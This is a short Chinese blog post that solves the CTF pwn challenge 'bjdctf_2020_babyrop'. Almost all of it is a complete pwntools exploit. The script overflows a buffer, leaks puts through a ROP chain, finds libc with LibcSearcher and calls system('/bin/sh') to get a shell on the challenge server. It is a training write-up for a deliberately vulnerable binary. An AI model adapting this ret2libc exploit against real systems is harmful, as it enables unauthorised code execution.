bjdctf_2020_babyrop

找不到libc文件用LibcSearcher模块

from pwn import *
from LibcSearcher import *

context.log_level='debug'
r=remote('node3.buuoj.cn',28426)
#r=process('./bjdctf_2020_babyrop')
elf=ELF('./bjdctf_2020_babyrop')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main_addr=elf.symbols['main']
pop_rdi=0x0000000000400733


payload='a'*0x20+'b'*0x8
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)
r.recv()

puts_addr=u64(r.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
system_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')

payload='a'*0x20+'b'*0x8
payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)

r.interactive()

posted @ 2020-02-15 17:22 高诺琪阅读(1271) 评论(0) 编辑收藏举报

刷新页面返回顶部

高诺琪

bjdctf_2020_babyrop

公告